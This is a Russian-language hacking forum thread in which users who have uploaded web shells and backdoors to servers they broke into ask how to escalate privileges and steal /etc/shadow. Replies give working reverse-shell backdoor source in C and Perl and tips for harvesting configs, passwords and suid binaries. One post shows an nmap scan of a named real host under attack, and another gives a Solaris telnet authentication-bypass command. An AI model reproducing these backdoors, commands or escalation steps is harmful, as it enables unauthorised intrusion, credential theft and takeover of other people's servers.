Added by L0rd_Ha0S: Вопросы по поднятию прав, по использованию разного рода скриптов, вроде web-шеллов, биндшеллов, бэкконект, и т.п. - задавать сюда! НЕ РАЗРЕШАЕТСЯ - вопросы о сплойтах, для этого есть специальные темы! В общем думаю не один сталкивался с такой ситуацией.. Взломали мы какую-нибудь CMS (не важно что) И залили наш шел... НО прав на редиктирование ГРУБО говоря index.php нет( Мой вопролс водится к тому, какие методы существую для поднятия прав на удаленом сервере. На самом деле тупой дефейс мне не нужен, просто хочу понять смысл.. Дак вот, мной был залит бек дур на серв (.pl) нет катом получул входящее соединение. В общем как мне поступать дальше ) Сервер управляется 5.4-RELEASE FreeBSD.
Посмотри статью Constantine http://forum.antichat.ru/thread30813.html Еще в разделе Статьи должно быть что-то по этой тематике.
Obormot Во-первых нужно узнать, стоит ли на apache noexec. Если стоит, то ты никакой бинарник из под nobody запустить не сможешь. Если не стоит и система не патченная, то можно попробовать сплойт для этой ветки. Почитай mysql-конфиги, возможно пасс оттуда подойдет на фтп. Прочитай /etc/passwd, отсей аккаунты, имеющие шелл и попробуй их видом login=pass на фтп. Ищи уязвимые демоны в системе (старые mysql, ftp, etc), уязвимости в которых позволяют повысить локальные привелегии. В общем, способов существует масса, нужно только проявить фантазию.
Здравствуйте. У меня вопрос примерно такой же. Залил р57 на серв, бэк коннект чет не контачит (вероятно кривые руки, неткатом слушаю порт, задаю в р57 ип, тыркаю кнопку и он виснет) может ли этому серв припятствовать? Есть ли другиt способы поднять права, или стащить /etc/shadow? Уж очень серв понравился)
Если твой комп в локальной сети, то есть ты выходишь через шлюз, то backconnect не получится. Вполне возможно, что на сервере правильно настроенный фаерволл, который блокирует любой неразрешенный явно траффик. Попробуй запустить backconnect вручную с помощью этих скриптов. Backconnect на С: Code: /* oooo...oooo.oooooooo8.ooooooooooo .8888o..88.888........88..888..88 .88.888o88..888oooooo.....888.... .88...8888.........888....888.... o88o....88.o88oooo888....o888o... ********************************* **** Network security team ****** ********* nst.void.ru *********** ********************************* * Title: nsT BackConnect Backdoor v1.0 * Date: 09.04.2006 * Usage: * client: nc -lp 9999 * server: ./backconnect <ip_client> 9999 ********************************* */ #include <stdlib.h> #include <stdio.h> #include <error.h> #include <string.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/types.h> #include <resolv.h> int main (int argc, char **argv) { struct sockaddr_in sock; int sd; char command[256]; if (argc < 3) { printf("%s <host> <port>\n", argv[0]); return 1; } close(1); if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) { perror(argv[0]); return 1; } bzero(&sock, sizeof(sock)); sock.sin_family = AF_INET; sock.sin_port = htons(atoi(argv[2])); inet_aton(argv[1], &sock.sin_addr); if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) { perror(argv[0]); return 1; } close(2); dup(sd); bzero(command, 256); while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) { system(command); bzero(command, 256); } close(sd); return 0; } Backconnect на Perl: Code: #!/usr/bin/perl use IO::Socket; #IRAN HACKERS SABOTAGE Connect Back Shell #code by:LorD #We Are :LorD-C0d3r-NT # #lord@SlackwareLinux:/home/programing$ perl dc.pl #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- # #Usage: dc.pl [Host] [Port] # #Ex: dc.pl 127.0.0.1 2121 #lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- # #[*] Resolving HostName #[*] Connecting... 127.0.0.1 #[*] Spawning Shell #[*] Connected to remote host #bash-2.05b# nc -vv -l -p 2121 #listening on [any] 2121 ... #connect to [127.0.0.1] from localhost [127.0.0.1] 2121 #--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- # #--==Systeminfo==-- #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux # #--==Userinfo==-- #uid=1001(lord) gid=100(users) groups=100(users) # #--==Directory==-- #/root # #--==Shell==-- # $system = '/bin/sh'; $ARGC=@ARGV; print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n"; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; print "[*] Resolving HostName\n"; print "[*] Connecting... $ARGV[0] \n"; print "[*] Spawning Shell \n"; print "[*] Connected to remote host \n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n"; system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo; echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); system($system); #EOF Если есть какие-то вопросы - не стесняйся задавать.
Что то, сколько ни пробовал, su -m nobody не дает прав nobody. Значит система пропатчена, или это работает только при настоящем ssh ?
При наличии терминала/псевдотерминала работает. По поводу поднятия прав - самый лучший вариант, конечно - чтение всяческих хисторей, пассвордов, конфигов. Кроме того, стоит поискать suid-бит на файлах, доступных на запись всем - такое тоже бывает. Ну и конечно суидные бинарники.
hsi Именно через шлюз, чет я раньше не подумал(. Пробовал на серве порт открыть, р57 опять виснет и нифига... Буду читать всяческие хистори, пассворы, конфиги) Оп просканировал только что порты, там бо2к на 54320-м висит и прокси элитный, часов 5 назад еще ниче не было))) Есть ли бо2к под линух?
Бред... С чего ты взял что там именно bo2k? Это тебе nmap сказал? С какими параметрами ты сканировал? Порт TCP или UDP? Сканер ошибся, просто 54320 - дефолтный порт Back Orifice 2000. Уж сколько лет, а он покоя народу не даёт. Кстати, если даже сканер не ошибся (точнее он всё равно ошибся), то это, вероятно, какой-нибдуь простенький honeypot для отлова всяких мег0 хекк3р0в. И ещё: А прокси теперь значит админы не могут для своих целей поднять? И что значит по-твоему элитный? То что он не светит remote addr и useragent? Как ты это определил? Различные чекеры тоже ошибаются =)
Может конечно и бред... Но помойму у тебя инфпрмации слишком мало, чтоб делать такие заключения. Наблюдаю за сервом уже дней 5, раньше портов было открыто в 2 раза меньше. Там дыр немерено... Помойму прост ктото вместе со мной там обитает... Вот зацените- 21/tcp open ftp 22/tcp open ssh 25/tcp filtered smtp 42/tcp filtered nameserver 80/tcp open http 81/tcp filtered hosts2-ns 111/tcp filtered rpcbind 135/tcp filtered msrpc 137/tcp filtered netbios-ns 139/tcp filtered netbios-ssn 389/tcp filtered ldap 445/tcp filtered microsoft-ds 513/tcp open login 514/tcp open shell 636/tcp filtered ldapssl 1001/tcp filtered unknown 1022/tcp filtered unknown 1023/tcp filtered netvenuechat 1025/tcp filtered NFS-or-IIS 1080/tcp open socks 1433/tcp filtered ms-sql-s 2049/tcp filtered nfs 2766/tcp filtered listen 3128/tcp filtered squid-http 3268/tcp filtered globalcatLDAP 3269/tcp filtered globalcatLDAPssl 4045/tcp open lockd 4444/tcp filtered krb524 5800/tcp filtered vnc-http 5900/tcp filtered vnc 6667/tcp open irc 8080/tcp open elit 32776/tcp open sometimes-rpc15 32778/tcp open sometimes-rpc19 32779/tcp open sometimes-rpc21 32780/tcp open sometimes-rpc23 54320/tcp open bo2k Еще портов 5 открыто было... Почему ты думашь, что сканер ошибся?
Bac9l Судя по портам - там windows. А что пишет веб-шелл рст? Если какой-то unix - то вполне возможно, что это honeypot.
2Bac9l попробуй утилиту amap от THC, оредели баннеры сервисов, также отсканируй nmap c опциями -sV -O -vvv и отпишись здесь. Если это FreeBSD-сервер с таким количеством открытых портов, форумной репутацией бьюсь об заклад, что это подсава в виде honeypot. LOL =). MS Sql не будет крутиться под FreeBSD, как и bo2k (читай предыдущий мой пост). и т.д. Может он обшибся? =) 2Bac9l как ты это определил?
Про 5.4-RELEASE FreeBSD эт не я говорил... Серв на SunOS 5.10 Generic точно. Вот че нмап сказал- Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2007-03-10 01:12 MSK Initiating SYN Stealth Scan against aux-209-217-33-203.oklahoma.net (209.217.33.203) [1663 ports] at 01:12 Discovered open port 22/tcp on 209.217.33.203 Discovered open port 80/tcp on 209.217.33.203 Discovered open port 21/tcp on 209.217.33.203 Discovered open port 32780/tcp on 209.217.33.203 Discovered open port 514/tcp on 209.217.33.203 Increasing send delay for 209.217.33.203 from 0 to 5 due to 39 out of 128 dropped probes since last increase. Discovered open port 32779/tcp on 209.217.33.203 SYN Stealth Scan Timing: About 29.13% done; ETC: 01:13 (0:01:13 remaining) Discovered open port 4045/tcp on 209.217.33.203 Discovered open port 32778/tcp on 209.217.33.203 Discovered open port 32776/tcp on 209.217.33.203 The SYN Stealth Scan took 75.38s to scan 1663 total ports. Initiating service scan against 9 services on aux-209-217-33-203.oklahoma.net (209.217.33.203) at 01:13 The service scan took 5.84s to scan 9 services on 1 host. Initiating RPCGrind Scan against aux-209-217-33-203.oklahoma.net (209.217.33.203) at 01:13 The RPCGrind Scan took 287.47s to scan 5 ports on aux-209-217-33-203.oklahoma.net (209.217.33.203). For OSScan assuming port 21 is open, 1 is closed, and neither are firewalled Host aux-209-217-33-203.oklahoma.net (209.217.33.203) appears to be up ... good. Interesting ports on aux-209-217-33-203.oklahoma.net (209.217.33.203): (The 1631 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.0a 22/tcp open ssh SunSSH 1.1 (protocol 2.0) 25/tcp filtered smtp 42/tcp filtered nameserver 80/tcp open http Apache httpd 81/tcp filtered hosts2-ns 111/tcp filtered rpcbind 135/tcp filtered msrpc 137/tcp filtered netbios-ns 139/tcp filtered netbios-ssn 389/tcp filtered ldap 445/tcp filtered microsoft-ds 514/tcp open shell? 636/tcp filtered ldapssl 1001/tcp filtered unknown 1022/tcp filtered unknown 1023/tcp filtered netvenuechat 1025/tcp filtered NFS-or-IIS 1433/tcp filtered ms-sql-s 2049/tcp filtered nfs 2766/tcp filtered listen 3128/tcp filtered squid-http 3268/tcp filtered globalcatLDAP 3269/tcp filtered globalcatLDAPssl 4045/tcp open nlockmgr 1-4 (rpc #100021) 4444/tcp filtered krb524 5800/tcp filtered vnc-http 5900/tcp filtered vnc 32776/tcp open metad 1-2 (rpc #100229) 32778/tcp open rpc.unknown 32779/tcp open rpc.metamedd 1 (rpc #100242) 32780/tcp open rpc Device type: general purpose Running: Sun Solaris 9 OS details: Sun Solaris 9 OS Fingerprint: TSeq(Class=RI%gcd=2%SI=23F27%IPID=I%TS=100HZ) T1(Resp=Y%DF=Y%W=C0B7%ACK=S++%Flags=AS%Ops=NNTMNW) T2(Resp=N) T3(Resp=N) T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T7(Resp=N) PU(Resp=Y%DF=Y%TOS=0%IPLEN=70%RIPTL=148%RID=E%RIPCK=E%UCK=F%ULEN=134%DAT=E) Uptime 31.955 days (since Tue Feb 6 02:22:45 2007) TCP Sequence Prediction: Class=random positive increments Difficulty=147239 (Good luck!) TCP ISN Seq. Numbers: 9E182FF0 9E26F16A 9E2D6746 9E34CDAE 9E46CB3A 9E4FAE7C IPID Sequence Generation: Incremental Nmap finished: 1 IP address (1 host up) scanned in 373.539 seconds Raw packets sent: 2182 (87.6KB) | Rcvd: 1665 (66.9KB) IRC и соксы исчезли) ну и еще че-то
SunOS jupiter 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-Enterprise. Днем там еще телнет открыт был. Не подскажешь, где webmin пароли хранит?
Читай конфиг - /etc/webmin/miniserv.conf Там указано, какие пароли он использует - из файла /etc/webmin/miniserv.users или /usr/local/etc/webmin/miniserv.users, либо системную авторизацию unix /etc/shadow.
К /etc/webmin/ доступ закрыт, к /var/webmin/ тоже, есть ток /opt/webmin/ а там как я понял только скрипты.
Вот и ответ! На солярке недавно багу нашли, позволяющую заходить по telnet любому юзеру не исползуя пароль вот таки макаром: telnet -l "-froot" <ip> Видимо, пока он был открыт - кто-то влез в неё, админ, обнаружив это, снёс демон in.telnetd и удалил весь срач, который оставил нерадивый хаксор. Хотя это мог и быть червь, который специально создан под данную уязвимость: А насчёт вот этого: Сорри, недоглядел. Кстати, как видишь, nmap ошибся. Такое часто случается, не стоит полагаться только на сканер - думай головой.
